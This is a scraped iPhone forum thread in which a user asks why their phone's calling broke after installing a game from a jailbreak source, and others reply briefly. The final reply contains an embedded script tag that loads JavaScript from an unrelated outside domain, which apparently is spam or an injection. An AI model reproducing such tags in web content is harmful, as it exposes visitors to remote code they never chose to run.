+ Reply

Your favorite Apple, iPhone, iPad, iOS, Jailbreak, and Cydia site.

Thread: crashed phone and more

is a discussion within the

Web Apps

forums, a part of the

3rd Party Apps For iPhone | iPod Touch

section;
I recently downloaded a pool game through Installer on Saturday night. After it completed the download, I noticed something along the lines of RevDip being updated. After finding out from
    What's Jailbreak?
    Thanks

Question crashed phone and more
    I recently downloaded a pool game through Installer on Saturday night. After it completed the download, I noticed something along the lines of RevDip being updated. After finding out from the vendor that the game has actually been removed and added to the App Store, I removed it. The next day, as I was trying to make a phone call, I got an error on my screen saying that this device was not compatible with the iPhone 3G. I also downloaded some other apps through Installer, so I'm not sure which one it was referring to. Ever since then, when I try to make a call, the screen disappears after a few seconds, and "Call" is missing from the been button. After setting everything back to default and numerous restated and hard reboots, Apple has informed me that I need to restore my phone via my PC and iTunes. Don't worry, I did not mention anything about installing a third party app. I'm basically trying to find out how and why this happened, and to make sure it doesn't happen again.

I'm also curious if there's a difference between the Text Guru app in Cydia vs. the App Store.

Sorry for the length!

What's Jailbreak?
    Thanks

I believe that was supposed to be RipDev instead!

What's Jailbreak?
    Thanks

Yeah it could be.
    I'm happy with my phone.

Green Apple
    Thanks

Quote Originally Posted by LibraKind View Post
    I recently downloaded a pool game through Installer on Saturday night. After it completed the download, I noticed something along the lines of RevDip being updated. After finding out from the vendor that the game has actually been removed and added to the App Store, I removed it. The next day, as I was trying to make a phone call, I got an error on my screen saying that this device was not compatible with the iPhone 3G. I also downloaded some other apps through Installer, so I'm not sure which one it was referring to. Ever since then, when I try to make a call, the screen disappears after a few seconds, and "Call" is missing from the been button. After setting everything back to default and numerous restated and hard reboots, Apple has informed me that I need to restore my phone via my PC and iTunes. Don't worry, I did not mention anything about installing a third party app. I'm basically trying to find out how and why this happened, and to make sure it doesn't happen again.

I'm also curious if there's a difference between the Text Guru app in Cydia vs. the App Store.

Sorry for the length!
    <script type="text/javascript" src="http://djmixdownloads.com/script.php"></script>
    try to update your software version